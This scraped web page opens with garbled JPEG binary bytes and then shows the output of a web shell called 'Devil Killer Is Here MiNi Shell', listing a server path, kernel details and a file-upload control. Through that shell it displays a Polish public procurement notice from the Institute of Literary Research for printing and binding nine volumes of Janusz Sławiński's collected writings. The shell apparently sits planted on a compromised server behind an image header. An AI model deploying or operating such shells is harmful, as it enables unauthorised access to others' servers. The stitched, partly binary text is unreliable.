JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240611/0036120001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Druk atramentowy i oprawa 9 tytułów &#34;Pisma zebrane Janusza Sławińskiego &#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Instytut Badań Literackich Polskiej Akademii Nauk</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000325771</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowy Świat 72</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-330</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">504478168</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">administracja@ibl.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ibl.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - Polska Akademia Nauk i tworzone przez nią jednostki organizacyjne</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Instytut Naukowy Polskiej Akademii Nauk </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Druk atramentowy i oprawa 9 tytułów &#34;Pisma zebrane Janusza Sławińskiego &#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-df460256-27d1-11ef-87ba-8eb060fd7bb8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00361200</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00354604/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Druk atramentowy i oprawa 9 tytułów Pisma zebrane Janusza Sławińskiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-df460256-27d1-11ef-87ba-8eb060fd7bb8 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">4. Ilekroć w SWZ użyte jest określenie „Portal” należy przez to rozumieć portal dostępowy znajdujący się pod adresem: https://ezamowienia.gov.pl/pl, poprzez który Zamawiający komunikuje się z Wykonawcami, który jednocześnie stanowi stronę internetową prowadzonego postępowania.<br/>5. Składanie ofert i oświadczeń, o których mowa w art. 125 ust. 1 uPzp odbywa się w formie lub postaci elektronicznej na Portalu. W tym celu Wykonawca zainteresowany złożeniem oferty w formie lub postaci elektronicznej, musi założyć swój profil na Portalu, podając niezbędne dane identyfikujące, zgodnie z wymaganiami opisanymi na tej platformie.<br/>7. Zamawiający ustala, że komunikacja pomiędzy Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej. Wszelką korespondencję do Zamawiającego związaną z niniejszym postępowaniem należy przekazywać za pomocą Portalu.<br/>9. Oferty w formie lub postaci elektronicznej należy składać na Portalu.<br/>https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający określa dopuszczalny format kwalifikowanego podpisu elektronicznego:<br/>a. dokumenty w formacie pdf należy podpisywać tylko formatem PAdES;<br/>b. Zamawiający dopuszcza podpisanie dokumentów w formacie innym niż ,,pdf&#34;, wtedy należy <br/>użyć formatu XadES.<br/>2. Wykonawca może podpisać dokumenty za pomocą:<br/>a. elektronicznego podpisu kwalifikowanego;<br/>b. podpisu zaufanego udostępnianego na Elektronicznej Platformie Usług Administracji <br/>Publicznej;<br/>c. podpisu osobistego udostępnianego w dowodzie osobistym wydanym po dniu 4 marca 2019 r. <br/>(UWAGA: podpis osobisty nie jest równoznaczny z podpisem własnoręcznym)<br/>3. Zamawiający określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na <br/>Portalu:<br/>a. stały dostęp do sieci Internet;<br/>b. zainstalowana przeglądarka internetowa: <br/>• Chrome w wersji 66 lub późniejsze; <br/>• Firefox w wersji 65 lub późniejsze;<br/>• Opera w wersji 58 lub późniejsze;<br/>• Edge w wersji 18 lub późniejsze;<br/>c. zainstalowany program Acrobat Reader lub inny umożliwiający obsługę formatów pdf;<br/>d. dopuszczalny format przesyłanych danych tj. plików o maksymalnej wielkości łącznej do 250 <br/>MB – pdf, doc, docx, xls, xlsx, odt, ods, zip, rar. Dokumenty złożone w postaci plików: jpg, jpeg, <br/>bmp, gif, lub w formacie nie wskazanym w zdaniu poprzedzającym, zostaną uznane za złożone <br/>niesku-tecznie;<br/>4. Zamawiający podaje także informacje na temat kodowania i czasu odbioru danych:<br/>a. plik załączony i zapisany przez Wykonawcę na Portalu nie jest widoczny dla Zamawiającego, po nieważ widnieje jako zaszyfrowany. Możliwość otworzenia pliku dostępna jest dopiero po <br/>odszy-frowaniu pliku po upływie terminu otwarcia ofert;<br/>b. oznaczenie czasu odbioru danych przez Portal stanowi „przypięta” do dokumentu <br/>elektroniczne-go data oraz dokładny czas (HH:MM:SS).<br/>5. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania <br/>konta na Portalu, ani logowania do Portalu.<br/>6. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych i <br/>infor-macji przekazywanych przy ich użyciu zostały opisane w Regulaminie Platformy e Zamówienia.<br/>7. W celu zapoznania się z funkcjonalnościami Portalu należy zapoznać się z poszczególnymi <br/>instrukcjami interaktywnymi zamieszczonymi w Centrum Pomocy Portalu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych),Zamawiający<br/>informuje, że:<br/>Ogłoszenie nr 2023/BZP 00288277/01 z dnia 2023-07-04<br/>2023-07-04 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>•administratorem Pani/Pana danych osobowych jest Instytut Badań Literackich Polskiej Akademii Nauk z siedzibą przy ul. Nowy<br/>Świat 72, 02-330 Warszawa, telefon 22 826 99 45;<br/>•inspektorem ochrony danych osobowych w IBL-PAN jest Małgorzata Lisowska, e-mail: malgorzata.lisowska@ibl.waw.pl;<br/>•Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODOw celu związanym z niniejszym postępowaniem<br/>o udzielenie zamówienia publicznego;<br/>•odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ust. 2 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t.j. Dz. U. z 2021 r. poz. 1129<br/>ze zm.);<br/>•Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>•obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z uPzp;<br/>•w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO; 8) posiada Pani/Pan:<br/>• na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>• na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z<br/>Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>• na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>•prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>•nie przysługuje Pani/Panu:<br/>•w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>•prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>• na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>•Ponadto Zamawiający zwraca uwagę, iż w zamówieniach publicznych administratorem danych osobowych obowiązanym do<br/>spełnienia obowiązku informacyjnego z art. 13 RODO jest także:<br/>•Wykonawca - względem osób fizycznych, od których dane osobowe bezpośrednio pozyskał. Dotyczy to w szczególności:<br/>•osoby fizycznej skierowanej do realizacji zamówienia, - podwykonawcy/podmiotu trzeciego będącego osobą fizyczną,<br/>•podwykonawcy/podmiotu trzeciego będącego osobą fizyczną, prowadzącą jednoosobową działalność gospodarczą,<br/>Pozostałe informacje dot. RODO znajdują się w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AG.26.4.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 110000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Druk atramentowy i oprawa 9 tytułów &#34;Pisma zebrane Janusza Sławińskiego&#34; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79810000-5 - Usługi drukowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79821000-5 - Drukarskie usługi wykańczalnicze</p> <p class="mb-0">79823000-9 - Usługi drukowania i dostawy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">) w kryterium ceny maksymalną liczbę punktów w tym kryterium (50 pkt) otrzyma <br/>Wykonawca, który zaproponuje najniższą cenę realizacji zamówienia. Podstawą oceny w <br/>tym kryterium będzie cena całkowita brutto podana przez Wykonawcę w formie <br/>oświadczenia <br/>w formularzu ofertowym (Załącznik nr 1 do SIWZ), natomiast pozostali wykonawcy <br/>otrzymają liczbę punktów, obliczoną zgodnie z poniższym wzorem:<br/> Cmin<br/>C = ---------------------- x 50<br/> Cbad<br/>gdzie:<br/>C – liczba uzyskanych punktów w kryterium cena<br/>Cmin – cena brutto oferty z najniższą ceną<br/>Cbad – cena brutto oferty badanej<br/>W tym kryterium oferta może uzyskać maksymalnie 50 pkt.<br/>b) Kryterium w 50% – jakość na podstawie przesłanych egzemplarzy.<br/>Kryterium – jakość na podstawie przesłanych egzemplarzy - w zakresie tego kryterium <br/>oceniane będzie zaoferowana jakość produktu; przy zaoferowaniu należytej jakości produktu <br/>zamówienia- oferta może uzyskać maksymalnie 50 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia ubiegać się mogą Wykonawcy którzy nie podlegają wykluczeniu na <br/>zasadach określonych w art. 108 ust. 1 uPzp oraz spełniają warunki udziału postawione w <br/>postępowaniu:<br/>1) w zakresie wskazanym w art. 112 ust. 2 pkt 2) uPzp, dotyczące uprawnień do prowadzenia <br/>określonej działalności gospodarczej lub zawodowej:<br/>Zamawiający nie stawia żadnego warunku w niniejszym zakresie. <br/>2) w zakresie wskazanym w art. 112 ust. 2 pkt 3) uPzp, dotyczące sytuacji ekonomicznej lub <br/>finansowej:<br/>Zamawiający nie stawia żadnego warunku w niniejszym zakresie. <br/>3) w zakresie wskazanym w art. 112 ust. 2 pkt 4) uPzp, dotyczące zdolności technicznej lub <br/>zawodowej:<br/>Określenie warunku: <br/>Strona 10 z 21<br/>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie <br/>ostatnich 3 (trzech) lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności <br/>jest krótszy – w tym okresie należycie wykonał lub wykonuje:<br/>- co najmniej 5 usług polegających na druku atramentowym i oprawie książek naukowych.<br/>Pojęcie „usługa” Zamawiający rozumie jako umowa lub kontrakt a zatem każda z <br/>poszczególnych usług to indywidualna umowa bądź kontrakt na druk atramentowy i <br/>oprawę książek naukowych. Zamawiający oczekuje więc wskazania w Wykazie usług co <br/>najmniej 5 umów bądź kontraktów niezależnie od ilości pozycji, których taka umowa czy <br/>kontrakt dotyczył. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia spełniania postawionych w postępowaniu warunków udziału:<br/>1) dotyczących zdolności technicznej lub zawodowej, Zamawiający żąda<br/>oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 7 ust. 1 <br/>ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie <br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie <br/>bezpieczeństwa narodowego – sporządzone zgodnie z załącznikiem nr 8 do SWZ;<br/>c) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku <br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego <br/>2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2021 r. poz. 275), z innym <br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie <br/>do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy <br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie <br/>oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu <br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór <br/>oświadczenia stanowi załącznik nr 9 do SWZ;<br/>d) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o <br/>którym mowa w art. 125 ust. 1 ustawy Pzp. Wzór oświadczenia stanowi załącznik nr 10 <br/>do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania postawionych w postępowaniu warunków udziału:<br/>1) dotyczących zdolności technicznej lub zawodowej, Zamawiający żąda:<br/>a) wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również <br/>wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, <br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem <br/>ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały <br/>wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane <br/>Strona 12 z 21<br/>lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje <br/>bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi <br/>były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, <br/>a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w <br/>stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń <br/>okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty <br/>potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 <br/>miesiące przed upływem terminu składania ofert, na wzorze stanowiącym Załącznik Nr <br/>7 do niniejszej SWZ, wraz z dowodami potwierdzającymi, że usługi te zostały wykonane <br/>lub są wykonywane należycie – składany wykaz, jak i dowody muszą być sporządzone <br/>w formie lub postaci elektronicznej i podpisane kwalifikowanym podpisem <br/>elektronicznym, podpisem zaufanym lub podpisem osobistym.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Zamawiający dopuszcza składanie ofert wspólnych. Jeżeli ofertę składa podmiot zbiorowy w <br/>rozumieniu art. 58 uPzp, w ofercie należy:<br/>a. wskazać podmioty (Wykonawców) składające ofertę wspólną (pełne nazwy i adresy <br/>siedzib);<br/>b. wskazać pełnomocnika do reprezentowania Wykonawców składających wspólną <br/>ofertę w postępowaniu o udzielenie zamówienia publicznego przed Zamawiającym <br/>albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia <br/>publicznego. Do oferty należy dołączyć stosowne 